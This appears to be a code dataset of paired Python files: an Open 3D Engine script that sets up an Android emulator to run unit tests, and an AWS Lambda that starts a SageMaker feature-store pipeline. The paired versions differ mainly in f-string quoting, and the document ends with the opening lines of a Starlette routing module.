self.avd_manager_cmd = Command("AVD Manager", self.android_sdk_path / 'tools' / 'bin' / 'avdmanager.bat')
self.sdk_manager_cmd = Command("SDK Manager", self.android_sdk_path / 'tools' / 'bin' / 'sdkmanager.bat')
self.adb_cmd = Command("ADB", self.android_sdk_path / 'platform-tools' / 'adb.exe')
def collect_android_sdk_list(self):
"""
Use the SDK Manager to get the list of installed, available, and updateable packages
:return: tuple of 3 lists: installed, available, and updateable packages
"""
result_str = self.sdk_manager_cmd.run_return_output(['--list'])
# the result will be listed out in 3 sections: Installed packages, Available Packages, and Available updates
# and each item is represented by 3 columns separated by a '|' character
installed_packages = []
available_packages = []
available_updates = []
current_append_list = None
for avd_item in result_str.split('\n'):
avd_item_stripped = avd_item.strip()
if not avd_item_stripped:
continue
if '|' not in avd_item_stripped:
if avd_item_stripped.upper() == 'INSTALLED PACKAGES:':
current_append_list = installed_packages
elif avd_item_stripped.upper() == 'AVAILABLE PACKAGES:':
current_append_list = available_packages
elif avd_item_stripped.upper() == 'AVAILABLE UPDATES:':
current_append_list = available_updates
else:
current_append_list = None
continue
item_parts = [split.strip() for split in avd_item_stripped.split('|')]
if len(item_parts) < 3:
continue
elif item_parts[1].upper() in ('VERSION', 'INSTALLED', '-------'):
continue
elif current_append_list is None:
continue
if current_append_list is not None:
current_append_list.append(item_parts)
return installed_packages, available_packages, available_updates
def update_installed_sdks(self):
"""
Run an SDK Manager update to make sure the SDKs are all up-to-date
"""
logging.info(f"Updating android SDK...")
self.sdk_manager_cmd.run(['--update'])
def install_system_package_if_necessary(self):
"""
Make sure that we have the correct system image installed, and install if not
"""
installed_packages, available_packages, _ = self.collect_android_sdk_list()
unit_test_sdk_package_name = f'system-images;{self.unit_test_avd_system_image}'
detected_sdk_package_version = None
for package_line_items in installed_packages:
if package_line_items[0] == unit_test_sdk_package_name:
detected_sdk_package_version = package_line_items[0]
if detected_sdk_package_version:
# Already installed
logging.info(f"Detected installed system image {self.unit_test_avd_system_image} version {detected_sdk_package_version}")
return
# Make sure its an available image to install
detected_available_sdk_package_version = None
for package_line_items in available_packages:
if package_line_items[0] == unit_test_sdk_package_name:
detected_available_sdk_package_version = package_line_items[0]
if not detected_available_sdk_package_version:
raise AndroidEmuError(f"Unable to install required system image {self.unit_test_avd_system_image}, not found by the Android SDK Manager")
# Install the package
logging.info(f"Installing system image {self.unit_test_avd_system_image}...")
self.sdk_manager_cmd.run(['--install', unit_test_sdk_package_name])
logging.info(f"Installed Completed")
def find_device_id_by_name(self, device_name):
"""
Find a device id (from AVD Manager) by the device name
:param device_name: Name to lookup
:return: The device id
"""
result_str = self.avd_manager_cmd.run_return_output(['list', 'device'])
result_lines = [result_line.strip() for result_line in result_str.split('\n')]
result_line_count = len(result_lines)
current_index = 0
device_to_id_map = {}
while current_index < result_line_count:
current_line = result_lines[current_index]
current_index += 1
# This assumes the pattern "id: <id> or "<device name>"
if current_line.startswith('id:') and 'or' in current_line:
id_and_name_combo = current_line.split('or')
id_and_value_combo = id_and_name_combo[0].split(' ')
name = id_and_name_combo[1].replace('"', '').strip().upper()
id = id_and_value_combo[1]
device_to_id_map[name] = id
if current_line.startswith('Available Android targets:'):
break
device_id = device_to_id_map.get(device_name.upper())
if not device_id:
raise AndroidEmuError(f"Unable to locate device id for '{device_name}'")
return device_id
def query_installed_avds(self):
"""
Get maps of all valid and invalid AVDs installed on the current system
:return: tuple of 2 maps (AVD Name -> Path): Valid and invalid
"""
result_str = self.avd_manager_cmd.run_return_output(['list', 'avd'])
result_lines = [result_line.strip() for result_line in result_str.split('\n')]
line_count = len(result_lines)
current_index = 0
current_name = None
current_path = None
valid_avd_to_path_map = {}
invalid_avd_to_path_map = {}
current_avd_to_path_map = valid_avd_to_path_map
while current_index < line_count:
current_line = result_lines[current_index]
current_index += 1
if current_line.startswith('Name:'):
name = current_line[6:].strip()
if current_name is not None:
current_avd_to_path_map[current_name] = current_path
current_path = None
current_name = name
elif current_line.startswith('Path:'):
current_path = current_line[6:].strip()
elif current_line.startswith('Device:'):
pass
elif 'could not be loaded:' in current_line:
if current_name is not None:
current_avd_to_path_map[current_name] = current_path
current_avd_to_path_map = invalid_avd_to_path_map
current_path = None
current_name = None
if current_name is not None:
current_avd_to_path_map[current_name] = current_path
return valid_avd_to_path_map, invalid_avd_to_path_map
def create_unitest_avd(self):
"""Create the unit test AVD"""
self.install_system_package_if_necessary()
device_id = self.find_device_id_by_name(self.unit_test_device_template_name)
self.avd_manager_cmd.run(['--silent',
'create', 'avd',
'--name', self.unit_test_avd_name,
'--package', f'system-images;{self.unit_test_avd_system_image}',
'--device', device_id])
valid_avd_map, _ = self.query_installed_avds()
unit_test_avd_path = valid_avd_map.get(self.unit_test_avd_name)
if not unit_test_avd_path:
raise AndroidEmuError(f"Unable to create unit test AVD {self.unit_test_avd_name}")
unit_test_avd_config_path = pathlib.Path(unit_test_avd_path) / 'config.ini'
if not unit_test_avd_config_path.is_file():
raise AndroidEmuError(f"Unable to create unit test AVD {self.unit_test_avd_name}: The expected config file '{unit_test_avd_config_path}' does not exist.")
config_content_full = unit_test_avd_config_path.read_text(encoding='UTF-8', errors='ignore')
for item, value in self.unit_test_device_settings_map.items():
regex_friendly_str = item.replace('.', '\\.')
repl_pattern = f"{regex_friendly_str}\\s*=\\s*[\\d]+"
repl_value = f"{item}={value}"
if re.search(repl_pattern, config_content_full):
config_content_full = re.sub(repl_pattern, repl_value, config_content_full)
else:
if not config_content_full.endswith('\n'):
config_content_full += '\n'
config_content_full += f"{repl_value}\n"
unit_test_avd_config_path.write_text(config_content_full)
def query_emulator_device_id(self):
result_str = self.adb_cmd.run_return_output(['devices', '-l'])
emulators = []
for result_line in result_str.split('\n'):
if not result_line.startswith('emulator-'):
continue
emulator = result_line[:result_line.find(' ')].strip()
emulators.append(emulator)
if len(emulators) > 1:
logging.warning(f"Found multiple emulators connect ({",".join(emulators)}). Defaulting to {emulators[0]}")
return emulators[0] if len(emulators) > 0 else None
def install_unit_test_avd(self):
"""
Install the unit test AVD (Android Virtual Device)
"""
valid_avd_map, invalid_avd_map = self.query_installed_avds()
if not self.unit_test_avd_name in valid_avd_map:
create_avd = True
elif self.force_avd_creation or self.unit_test_avd_name in invalid_avd_map:
logging.info(f"Deleting AVD {self.unit_test_avd_name}..")
self.avd_manager_cmd.run(['delete', 'avd', '--name', self.unit_test_avd_name])
create_avd = True
else:
create_avd = False
if create_avd:
self.create_unitest_avd()
def uninstall_unit_test_avd(self):
"""
Uninstall the unit test AVD
"""
logging.info(f"Uninstalling AVD {self.unit_test_avd_name}..")
self.avd_manager_cmd.run(['delete', 'avd', '--name', self.unit_test_avd_name])
def launch_emulator_process(self):
"""
Launch the emulator process for the unit test avd and return the process handle and its device id
:return: tuple of the process handle and the device id for the emulator
"""
emulator_device_id = None
process = None
try:
# Launch the emulator process
emulator_process_args = [
"-avd",
self.unit_test_avd_name
]
if self.hide_emulator_windows:
emulator_process_args.append("-no-window")
process = self.emulator_cmd.run_process(emulator_process_args)
# Wait for the emulator to signal that its bootup is complete
boot_completed = False
start_time = time.time()
timeout_secs = 360
while process.poll() is None:
elapsed_time = time.time() - start_time
if elapsed_time > timeout_secs > 0:
break
line = process.stdout.readline()
print(line, end='')
if "boot completed" in line:
boot_completed = True
break
if not boot_completed:
raise AndroidEmuError("Bootup of emulator timed out")
# query ADB to get the emulator ID
emulator_device_id = self.query_emulator_device_id()
return process, emulator_device_id
except Exception:
if process:
if emulator_device_id:
self.terminate_emulator_process(emulator_device_id)
else:
process.kill()
raise
def terminate_emulator_process(self, device_id):
# Terminate the emulator
kill_emu_args = [
'-s', device_id,
'emu', 'kill'
]
self.adb_cmd.run(kill_emu_args)
def run_emulation_process(self, process_func):
"""
Execute a function that relies on the session based android simulator.
:param process_func: The process function to execute. Function requires one argument which will be the device id
:return: The return value of the process function
"""
emulator_device_id = None
try:
emulator_process, emulator_device_id = self.launch_emulator_process()
return process_func(emulator_device_id)
finally:
if emulator_device_id is not None:
self.terminate_emulator_process(emulator_device_id)
def process_unit_test_on_simulator(base_android_sdk_path, build_path, build_config):
"""
Run the android unit tests on a sessioned simulator
:param base_android_sdk_path: The path to where the Android SDK exists
:param build_path: The build path relative to the engine root where the android unit test project is configured and built
:param build_config: The configuration of the build unit test APK to run
"""
python_cmd = Command("Python", ENGINE_ROOT / 'python' / 'python.cmd')
android_script_root = ENGINE_ROOT / 'cmake' / 'Tools' / 'Platform' / 'Android'
assert android_script_root.is_dir(), "Missing the android scripts path in the engine folder hierarchy"
deploy_android_py_path = android_script_root / 'deploy_android.py'
assert deploy_android_py_path.is_file(), "Missing the android deployment script in the engine folder hierarchy"
launch_android_ptest_py_path = android_script_root / 'launch_android_test.py'
assert launch_android_ptest_py_path.is_file(), "Missing the android unit test launcher script in the engine folder hierarchy"
def _install_and_run_unit_tests(emulator_id):
# install unit test on the emulator
install_apk_args = [
str(deploy_android_py_path),
'-b', build_path,
'-c', build_config,
'--device-id-filter', emulator_id,
'--clean'
]
python_cmd.run(cmd_args=install_apk_args,
cwd=os.path.normpath(str(ENGINE_ROOT)))
try:
# Launch the unit test on the emulator
launch_apk_args = [
str(launch_android_ptest_py_path),
'-b', build_path,
'-c', build_config,
'--device-serial', emulator_id
]
python_cmd.run(cmd_args=launch_apk_args,
cwd=os.path.normpath(str(ENGINE_ROOT)))
return True
except AndroidEmuError:
print("\n\n")
raise AndroidEmuError("Unit Tests Failed")
# Prepare the emulator manager
manager = AndroidEmulatorManager(base_android_sdk_path=base_android_sdk_path,
force_avd_creation=True)
# Make sure that the android SDK is up to date
manager.update_installed_sdks()
# First Install or overwrite the unit test emulator
manager.install_unit_test_avd()
# Run the emulator-dependent process based on the session AVD created by the manager
manager.run_emulation_process(_install_and_run_unit_tests)
# Uninstall the AVD when done
manager.uninstall_unit_test_avd()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Install and an android unit test APK on a android simulator.")
parser.add_argument('--android-sdk-path',
help='Path to the Android SDK')
parser.add_argument('--build-path',
help='The build path (relative to the engine root) where the project was generated and the APK is built',
required=True)
parser.add_argument('--build-config',
help='The build config of the built APK',
required=True)
parser.add_argument('--debug',
help='Enable debug messages from this script',
action="store_true")
parsed_args = parser.parse_args(sys.argv[1:])
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG if parsed_args.debug else logging.INFO)
try:
base_android_sdk_path = pathlib.Path(parsed_args.android_sdk_path) if parsed_args.android_sdk_path else get_android_sdk_path()
process_unit_test_on_simulator(base_android_sdk_path=base_android_sdk_path,
build_path=parsed_args.build_path,
build_config=parsed_args.build_config)
exit(0)
except AndroidEmuError as e:
print(e)
exit(1)
| #
# Copyright (c) Contributors to the Open 3D Engine Project. For complete copyright and license terms please see the LICENSE at the root of this distribution.
#
# SPDX-License-Identifier: Apache-2.0 OR MIT
#
#
import argparse
import os
import pathlib
import re
import sys
import subprocess
import time
import logging
CURRENT_PATH = pathlib.Path(os.path.dirname(__file__)).absolute()
# The engine root is based on the location of this file (<ENGINE_ROOT>/scripts/build/Platform/Android). Walk up to calculate the engine root
ENGINE_ROOT = CURRENT_PATH.parents[3]
class AndroidEmuError(Exception):
pass
def get_android_sdk_path():
try:
android_sdk_path = pathlib.Path(os.getenv('LY_ANDROID_SDK'))
if not android_sdk_path:
raise AndroidEmuError(f"LY_ANDROID_SDK environment variable is not set")
if not android_sdk_path.is_dir():
raise AndroidEmuError(f"Android SDK Path ('{android_sdk_path}') set with the LY_ANDROID_SDK variable is invalid")
#TODO: Sanity check on necessary files
return android_sdk_path
except Exception as err:
raise AndroidEmuError(f"Unable to determine android SDK path: {err}")
class Command(object):
def __init__(self, tool_name, tool_path, run_as_shell=True):
if not tool_path.is_file():
raise AndroidEmuError(f"Invalid path for {tool_name}. Cannot find ('{tool_path.absolute()}')")
self.tool_path = tool_path
self.run_as_shell = run_as_shell
def run_return_output(self, cmd_args):
args = [str(self.tool_path)]
if isinstance(cmd_args, str):
args.append(cmd_args)
elif isinstance(cmd_args, list):
args.extend(cmd_args)
else:
assert False, "run_return_output argument must be a string or list of strings"
full_cmd = subprocess.list2cmdline(args)
logging.debug(f"run_return_output: {full_cmd}")
run_result = subprocess.run(args,
capture_output=True,
encoding='UTF-8',
errors='ignore',
shell=self.run_as_shell)
if run_result.returncode != 0:
raise AndroidEmuError(f"Error executing command '{full_cmd}' (return code {run_result.returncode}): {run_result.stderr}")
return run_result.stdout
def run(self, cmd_args, cwd=None, suppress_output=False):
args = [str(self.tool_path)]
if isinstance(cmd_args, str):
args.append(cmd_args)
elif isinstance(cmd_args, list):
args.extend(cmd_args)
else:
assert False, "run_return_output argument must be a string or list of strings"
full_cmd = subprocess.list2cmdline(args)
logging.debug(f"run: {full_cmd}")
run_result = subprocess.run(args,
#stdout=subprocess.DEVNULL if suppress_output else subprocess.STDOUT,
capture_output=False,
shell=self.run_as_shell,
cwd=cwd)
if run_result.returncode != 0:
raise AndroidEmuError(f"Error executing command '{full_cmd}' (return code {run_result.returncode}): {run_result.stderr}")
def run_process(self, cmd_args):
args = [str(self.tool_path)]
if isinstance(cmd_args, str):
args.append(cmd_args)
elif isinstance(cmd_args, list):
args.extend(cmd_args)
else:
assert False, "run_return_output argument must be a string or list of strings"
full_cmd = subprocess.list2cmdline(args)
logging.debug(f"run_process: {full_cmd}")
process = subprocess.Popen(args,
shell=True,
stdout=subprocess.PIPE,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP | subprocess.NORMAL_PRIORITY_CLASS |
subprocess.CREATE_NO_WINDOW,
encoding='UTF-8',
errors='ignore')
return process
class AndroidEmulatorManager(object):
UNIT_TEST_AVD_NAME = "LY_UNITTEST_AVD"
UNIT_TEST_SYSTEM_IMAGE_PACKAGE = "android-30;google_apis;x86_64"
UNIT_TEST_DEVICE_TEMPLATE_NAME = "pixel_xl"
UNIT_TEST_DEVICE_SETTINGS_MAP = {
"disk.dataPartition.size": "32G",
"vm.heapSize": "1024",
"hw.ramSize": "2048",
"hw.sdCard": "no"
}
EMULATOR_STARTUP_TIMEOUT_SECS = 60*5 # Set the emulator startup timeout to 5 minutes
def __init__(self, base_android_sdk_path, hide_emulator_windows=True, force_avd_creation=False, emulator_startup_timeout=EMULATOR_STARTUP_TIMEOUT_SECS):
self.android_sdk_path = base_android_sdk_path
self.force_avd_creation = force_avd_creation
self.unit_test_avd_name = AndroidEmulatorManager.UNIT_TEST_AVD_NAME
self.unit_test_device_template_name = AndroidEmulatorManager.UNIT_TEST_DEVICE_TEMPLATE_NAME
self.unit_test_device_settings_map = AndroidEmulatorManager.UNIT_TEST_DEVICE_SETTINGS_MAP
self.unit_test_avd_system_image = AndroidEmulatorManager.UNIT_TEST_SYSTEM_IMAGE_PACKAGE
self.hide_emulator_windows = hide_emulator_windows
self.emulator_startup_timeout = emulator_startup_timeout
self.emulator_cmd = Command("Emulator", self.android_sdk_path / 'emulator' / 'emulator.exe')
self.avd_manager_cmd = Command("AVD Manager", self.android_sdk_path / 'tools' / 'bin' / 'avdmanager.bat')
self.sdk_manager_cmd = Command("SDK Manager", self.android_sdk_path / 'tools' / 'bin' / 'sdkmanager.bat')
self.adb_cmd = Command("ADB", self.android_sdk_path / 'platform-tools' / 'adb.exe')
def collect_android_sdk_list(self):
"""
Use the SDK Manager to get the list of installed, available, and updateable packages
:return: tuple of 3 lists: installed, available, and updateable packages
"""
result_str = self.sdk_manager_cmd.run_return_output(['--list'])
# the result will be listed out in 3 sections: Installed packages, Available Packages, and Available updates
# and each item is represented by 3 columns separated by a '|' character
installed_packages = []
available_packages = []
available_updates = []
current_append_list = None
for avd_item in result_str.split('\n'):
avd_item_stripped = avd_item.strip()
if not avd_item_stripped:
continue
if '|' not in avd_item_stripped:
if avd_item_stripped.upper() == 'INSTALLED PACKAGES:':
current_append_list = installed_packages
elif avd_item_stripped.upper() == 'AVAILABLE PACKAGES:':
current_append_list = available_packages
elif avd_item_stripped.upper() == 'AVAILABLE UPDATES:':
current_append_list = available_updates
else:
current_append_list = None
continue
item_parts = [split.strip() for split in avd_item_stripped.split('|')]
if len(item_parts) < 3:
continue
elif item_parts[1].upper() in ('VERSION', 'INSTALLED', '-------'):
continue
elif current_append_list is None:
continue
if current_append_list is not None:
current_append_list.append(item_parts)
return installed_packages, available_packages, available_updates
def update_installed_sdks(self):
"""
Run an SDK Manager update to make sure the SDKs are all up-to-date
"""
logging.info(f"Updating android SDK...")
self.sdk_manager_cmd.run(['--update'])
def install_system_package_if_necessary(self):
"""
Make sure that we have the correct system image installed, and install if not
"""
installed_packages, available_packages, _ = self.collect_android_sdk_list()
unit_test_sdk_package_name = f'system-images;{self.unit_test_avd_system_image}'
detected_sdk_package_version = None
for package_line_items in installed_packages:
if package_line_items[0] == unit_test_sdk_package_name:
detected_sdk_package_version = package_line_items[0]
if detected_sdk_package_version:
# Already installed
logging.info(f"Detected installed system image {self.unit_test_avd_system_image} version {detected_sdk_package_version}")
return
# Make sure its an available image to install
detected_available_sdk_package_version = None
for package_line_items in available_packages:
if package_line_items[0] == unit_test_sdk_package_name:
detected_available_sdk_package_version = package_line_items[0]
if not detected_available_sdk_package_version:
raise AndroidEmuError(f"Unable to install required system image {self.unit_test_avd_system_image}, not found by the Android SDK Manager")
# Install the package
logging.info(f"Installing system image {self.unit_test_avd_system_image}...")
self.sdk_manager_cmd.run(['--install', unit_test_sdk_package_name])
logging.info(f"Installed Completed")
def find_device_id_by_name(self, device_name):
"""
Find a device id (from AVD Manager) by the device name
:param device_name: Name to lookup
:return: The device id
"""
result_str = self.avd_manager_cmd.run_return_output(['list', 'device'])
result_lines = [result_line.strip() for result_line in result_str.split('\n')]
result_line_count = len(result_lines)
current_index = 0
device_to_id_map = {}
while current_index < result_line_count:
current_line = result_lines[current_index]
current_index += 1
# This assumes the pattern "id: <id> or "<device name>"
if current_line.startswith('id:') and 'or' in current_line:
id_and_name_combo = current_line.split('or')
id_and_value_combo = id_and_name_combo[0].split(' ')
name = id_and_name_combo[1].replace('"', '').strip().upper()
id = id_and_value_combo[1]
device_to_id_map[name] = id
if current_line.startswith('Available Android targets:'):
break
device_id = device_to_id_map.get(device_name.upper())
if not device_id:
raise AndroidEmuError(f"Unable to locate device id for '{device_name}'")
return device_id
def query_installed_avds(self):
"""
Get maps of all valid and invalid AVDs installed on the current system
:return: tuple of 2 maps (AVD Name -> Path): Valid and invalid
"""
result_str = self.avd_manager_cmd.run_return_output(['list', 'avd'])
result_lines = [result_line.strip() for result_line in result_str.split('\n')]
line_count = len(result_lines)
current_index = 0
current_name = None
current_path = None
valid_avd_to_path_map = {}
invalid_avd_to_path_map = {}
current_avd_to_path_map = valid_avd_to_path_map
while current_index < line_count:
current_line = result_lines[current_index]
current_index += 1
if current_line.startswith('Name:'):
name = current_line[6:].strip()
if current_name is not None:
current_avd_to_path_map[current_name] = current_path
current_path = None
current_name = name
elif current_line.startswith('Path:'):
current_path = current_line[6:].strip()
elif current_line.startswith('Device:'):
pass
elif 'could not be loaded:' in current_line:
if current_name is not None:
current_avd_to_path_map[current_name] = current_path
current_avd_to_path_map = invalid_avd_to_path_map
current_path = None
current_name = None
if current_name is not None:
current_avd_to_path_map[current_name] = current_path
return valid_avd_to_path_map, invalid_avd_to_path_map
def create_unitest_avd(self):
"""Create the unit test AVD"""
self.install_system_package_if_necessary()
device_id = self.find_device_id_by_name(self.unit_test_device_template_name)
self.avd_manager_cmd.run(['--silent',
'create', 'avd',
'--name', self.unit_test_avd_name,
'--package', f'system-images;{self.unit_test_avd_system_image}',
'--device', device_id])
valid_avd_map, _ = self.query_installed_avds()
unit_test_avd_path = valid_avd_map.get(self.unit_test_avd_name)
if not unit_test_avd_path:
raise AndroidEmuError(f"Unable to create unit test AVD {self.unit_test_avd_name}")
unit_test_avd_config_path = pathlib.Path(unit_test_avd_path) / 'config.ini'
if not unit_test_avd_config_path.is_file():
raise AndroidEmuError(f"Unable to create unit test AVD {self.unit_test_avd_name}: The expected config file '{unit_test_avd_config_path}' does not exist.")
config_content_full = unit_test_avd_config_path.read_text(encoding='UTF-8', errors='ignore')
for item, value in self.unit_test_device_settings_map.items():
regex_friendly_str = item.replace('.', '\\.')
repl_pattern = f"{regex_friendly_str}\\s*=\\s*[\\d]+"
repl_value = f"{item}={value}"
if re.search(repl_pattern, config_content_full):
config_content_full = re.sub(repl_pattern, repl_value, config_content_full)
else:
if not config_content_full.endswith('\n'):
config_content_full += '\n'
config_content_full += f"{repl_value}\n"
unit_test_avd_config_path.write_text(config_content_full)
def query_emulator_device_id(self):
result_str = self.adb_cmd.run_return_output(['devices', '-l'])
emulators = []
for result_line in result_str.split('\n'):
if not result_line.startswith('emulator-'):
continue
emulator = result_line[:result_line.find(' ')].strip()
emulators.append(emulator)
if len(emulators) > 1:
logging.warning(f"Found multiple emulators connect ({','.join(emulators)}). Defaulting to {emulators[0]}")
return emulators[0] if len(emulators) > 0 else None
def install_unit_test_avd(self):
"""
Install the unit test AVD (Android Virtual Device)
"""
valid_avd_map, invalid_avd_map = self.query_installed_avds()
if not self.unit_test_avd_name in valid_avd_map:
create_avd = True
elif self.force_avd_creation or self.unit_test_avd_name in invalid_avd_map:
logging.info(f"Deleting AVD {self.unit_test_avd_name}..")
self.avd_manager_cmd.run(['delete', 'avd', '--name', self.unit_test_avd_name])
create_avd = True
else:
create_avd = False
if create_avd:
self.create_unitest_avd()
def uninstall_unit_test_avd(self):
"""
Uninstall the unit test AVD
"""
logging.info(f"Uninstalling AVD {self.unit_test_avd_name}..")
self.avd_manager_cmd.run(['delete', 'avd', '--name', self.unit_test_avd_name])
def launch_emulator_process(self):
"""
Launch the emulator process for the unit test avd and return the process handle and its device id
:return: tuple of the process handle and the device id for the emulator
"""
emulator_device_id = None
process = None
try:
# Launch the emulator process
emulator_process_args = [
"-avd",
self.unit_test_avd_name
]
if self.hide_emulator_windows:
emulator_process_args.append("-no-window")
process = self.emulator_cmd.run_process(emulator_process_args)
# Wait for the emulator to signal that its bootup is complete
boot_completed = False
start_time = time.time()
timeout_secs = 360
while process.poll() is None:
elapsed_time = time.time() - start_time
if elapsed_time > timeout_secs > 0:
break
line = process.stdout.readline()
print(line, end='')
if "boot completed" in line:
boot_completed = True
break
if not boot_completed:
raise AndroidEmuError("Bootup of emulator timed out")
# query ADB to get the emulator ID
emulator_device_id = self.query_emulator_device_id()
return process, emulator_device_id
except Exception:
if process:
if emulator_device_id:
self.terminate_emulator_process(emulator_device_id)
else:
process.kill()
raise
def terminate_emulator_process(self, device_id):
# Terminate the emulator
kill_emu_args = [
'-s', device_id,
'emu', 'kill'
]
self.adb_cmd.run(kill_emu_args)
def run_emulation_process(self, process_func):
"""
Execute a function that relies on the session based android simulator.
:param process_func: The process function to execute. Function requires one argument which will be the device id
:return: The return value of the process function
"""
emulator_device_id = None
try:
emulator_process, emulator_device_id = self.launch_emulator_process()
return process_func(emulator_device_id)
finally:
if emulator_device_id is not None:
self.terminate_emulator_process(emulator_device_id)
def process_unit_test_on_simulator(base_android_sdk_path, build_path, build_config):
"""
Run the android unit tests on a sessioned simulator
:param base_android_sdk_path: The path to where the Android SDK exists
:param build_path: The build path relative to the engine root where the android unit test project is configured and built
:param build_config: The configuration of the build unit test APK to run
"""
python_cmd = Command("Python", ENGINE_ROOT / 'python' / 'python.cmd')
android_script_root = ENGINE_ROOT / 'cmake' / 'Tools' / 'Platform' / 'Android'
assert android_script_root.is_dir(), "Missing the android scripts path in the engine folder hierarchy"
deploy_android_py_path = android_script_root / 'deploy_android.py'
assert deploy_android_py_path.is_file(), "Missing the android deployment script in the engine folder hierarchy"
launch_android_ptest_py_path = android_script_root / 'launch_android_test.py'
assert launch_android_ptest_py_path.is_file(), "Missing the android unit test launcher script in the engine folder hierarchy"
def _install_and_run_unit_tests(emulator_id):
# install unit test on the emulator
install_apk_args = [
str(deploy_android_py_path),
'-b', build_path,
'-c', build_config,
'--device-id-filter', emulator_id,
'--clean'
]
python_cmd.run(cmd_args=install_apk_args,
cwd=os.path.normpath(str(ENGINE_ROOT)))
try:
# Launch the unit test on the emulator
launch_apk_args = [
str(launch_android_ptest_py_path),
'-b', build_path,
'-c', build_config,
'--device-serial', emulator_id
]
python_cmd.run(cmd_args=launch_apk_args,
cwd=os.path.normpath(str(ENGINE_ROOT)))
return True
except AndroidEmuError:
print("\n\n")
raise AndroidEmuError("Unit Tests Failed")
# Prepare the emulator manager
manager = AndroidEmulatorManager(base_android_sdk_path=base_android_sdk_path,
force_avd_creation=True)
# Make sure that the android SDK is up to date
manager.update_installed_sdks()
# First Install or overwrite the unit test emulator
manager.install_unit_test_avd()
# Run the emulator-dependent process based on the session AVD created by the manager
manager.run_emulation_process(_install_and_run_unit_tests)
# Uninstall the AVD when done
manager.uninstall_unit_test_avd()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Install and an android unit test APK on a android simulator.")
parser.add_argument('--android-sdk-path',
help='Path to the Android SDK')
parser.add_argument('--build-path',
help='The build path (relative to the engine root) where the project was generated and the APK is built',
required=True)
parser.add_argument('--build-config',
help='The build config of the built APK',
required=True)
parser.add_argument('--debug',
help='Enable debug messages from this script',
action="store_true")
parsed_args = parser.parse_args(sys.argv[1:])
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG if parsed_args.debug else logging.INFO)
try:
base_android_sdk_path = pathlib.Path(parsed_args.android_sdk_path) if parsed_args.android_sdk_path else get_android_sdk_path()
process_unit_test_on_simulator(base_android_sdk_path=base_android_sdk_path,
build_path=parsed_args.build_path,
build_config=parsed_args.build_config)
exit(0)
except AndroidEmuError as e:
print(e)
exit(1)
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import json
import boto3
import datetime
s3 = boto3.resource('s3')
sm = boto3.client('sagemaker')
time_created = datetime.datetime.now()
def lambda_handler(event, context):
print(f'Time Lambda created: {time_created}')
#Check version of Boto3 - It must be at least 1.16.55
print(f"The version of Boto3 is {boto3.__version__}")
#Get location for where the new data (csv) file was uploaded
data_bucket = event['Records'][0]['s3']['bucket']['name']
data_key = event['Records'][0]['s3']['object']['key']
print(f"A new file named {data_key} was just uploaded to Amazon S3 in {data_bucket}")
#Update values for where Data Wrangler .flow is saved
flow_bucket = 'sagemaker-us-east-1-572539092864'
flow_key = 'sagemaker-feature-store/fscw/data_wrangler_flows/DWF-Orders.flow'
pipeline_name = 'featurestore-ingest-pipeline-12-14-08-07'
execution_display = f"{data_key.split("/")[-1].replace("_","").replace(".csv","")}"
#Get .flow file from Amazon S3
get_object = s3.Object(flow_bucket,flow_key)
get_flow = get_object.get()
#Read, update and save the .flow file
flow_content = json.loads(get_flow['Body'].read())
flow_content['nodes'][0]['parameters']['dataset_definition']['name'] = data_key.split('/')[-1]
flow_content['nodes'][0]['parameters']['dataset_definition']['s3ExecutionContext']['s3Uri'] = f"s3://{data_bucket}/{data_key}"
new_flow_key = flow_key.replace('.flow', '-' + data_key.split('/')[-1].replace('.csv','') + '.flow')
new_flow_uri = f"s3://{flow_bucket}/{new_flow_key}"
put_object = s3.Object(flow_bucket,new_flow_key)
put_flow = put_object.put(Body=json.dumps(flow_content))
#Start the pipeline execution
start_pipeline = sm.start_pipeline_execution(
PipelineName=pipeline_name,
PipelineExecutionDisplayName=f"{data_key.split("/")[-1].replace("_","").replace(".csv","")}",
PipelineParameters=[
{
'Name': 'InputFlow',
'Value': new_flow_uri
},
],
PipelineExecutionDescription=data_key
)
print(start_pipeline)
return('SageMaker Pipeline has been successfully started...')
| # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import json
import boto3
import datetime
s3 = boto3.resource('s3')
sm = boto3.client('sagemaker')
time_created = datetime.datetime.now()
def lambda_handler(event, context):
print(f'Time Lambda created: {time_created}')
#Check version of Boto3 - It must be at least 1.16.55
print(f"The version of Boto3 is {boto3.__version__}")
#Get location for where the new data (csv) file was uploaded
data_bucket = event['Records'][0]['s3']['bucket']['name']
data_key = event['Records'][0]['s3']['object']['key']
print(f"A new file named {data_key} was just uploaded to Amazon S3 in {data_bucket}")
#Update values for where Data Wrangler .flow is saved
flow_bucket = 'sagemaker-us-east-1-572539092864'
flow_key = 'sagemaker-feature-store/fscw/data_wrangler_flows/DWF-Orders.flow'
pipeline_name = 'featurestore-ingest-pipeline-12-14-08-07'
execution_display = f"{data_key.split('/')[-1].replace('_','').replace('.csv','')}"
#Get .flow file from Amazon S3
get_object = s3.Object(flow_bucket,flow_key)
get_flow = get_object.get()
#Read, update and save the .flow file
flow_content = json.loads(get_flow['Body'].read())
flow_content['nodes'][0]['parameters']['dataset_definition']['name'] = data_key.split('/')[-1]
flow_content['nodes'][0]['parameters']['dataset_definition']['s3ExecutionContext']['s3Uri'] = f"s3://{data_bucket}/{data_key}"
new_flow_key = flow_key.replace('.flow', '-' + data_key.split('/')[-1].replace('.csv','') + '.flow')
new_flow_uri = f"s3://{flow_bucket}/{new_flow_key}"
put_object = s3.Object(flow_bucket,new_flow_key)
put_flow = put_object.put(Body=json.dumps(flow_content))
#Start the pipeline execution
start_pipeline = sm.start_pipeline_execution(
PipelineName=pipeline_name,
PipelineExecutionDisplayName=f"{data_key.split('/')[-1].replace('_','').replace('.csv','')}",
PipelineParameters=[
{
'Name': 'InputFlow',
'Value': new_flow_uri
},
],
PipelineExecutionDescription=data_key
)
print(start_pipeline)
return('SageMaker Pipeline has been successfully started...')
|
"""
Module to dynamically generate a Starlette routing map based on a directory tree.
"""
import importlib
import inspect
import typing as t
from pathlib import Path
from starlette.routing import Route as StarletteRoute, BaseRoute, Mount
from nested_dict import nested_dict
from backend.route import Route
